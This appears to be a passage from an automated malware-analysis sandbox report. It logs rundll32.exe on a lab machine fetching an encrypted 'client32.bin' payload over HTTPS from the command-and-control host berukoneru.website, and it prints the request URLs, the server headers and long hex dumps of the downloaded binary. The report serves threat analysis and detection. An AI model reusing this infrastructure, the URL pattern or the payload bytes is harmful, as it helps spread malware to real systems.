                            Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            7192.168.2.64982079.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:39 UTC1627OUTGET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC1627INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 268426
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=vvpskej8dhpqjtcv2a9elais61; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC1628INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                            Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                            2021-12-14 09:21:39 UTC1643INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                            Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                            2021-12-14 09:21:39 UTC1659INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                            Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                            2021-12-14 09:21:39 UTC1675INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                            Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                            2021-12-14 09:21:39 UTC1691INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                            Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                            2021-12-14 09:21:39 UTC1707INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                            Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                            2021-12-14 09:21:39 UTC1723INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                            Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                            2021-12-14 09:21:39 UTC1739INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                            Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                            2021-12-14 09:21:39 UTC1755INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                            Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                            2021-12-14 09:21:39 UTC1771INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                            Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                            2021-12-14 09:21:39 UTC1787INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                            Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                            2021-12-14 09:21:40 UTC1803INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                            Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                            2021-12-14 09:21:40 UTC1819INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                            Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                            2021-12-14 09:21:40 UTC1835INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                            Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                            2021-12-14 09:21:40 UTC1851INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                            Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                            2021-12-14 09:21:40 UTC1867INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                            Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                            2021-12-14 09:21:40 UTC1884INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                            Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            8192.168.2.64982179.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:40 UTC1883OUTGET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:40 UTC1890INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:40 GMT
                            Content-Type: application/zip
                            Content-Length: 1869
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=3g53sj8d899903i6i2mpe7v7i2; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:40 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:40 UTC1891INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 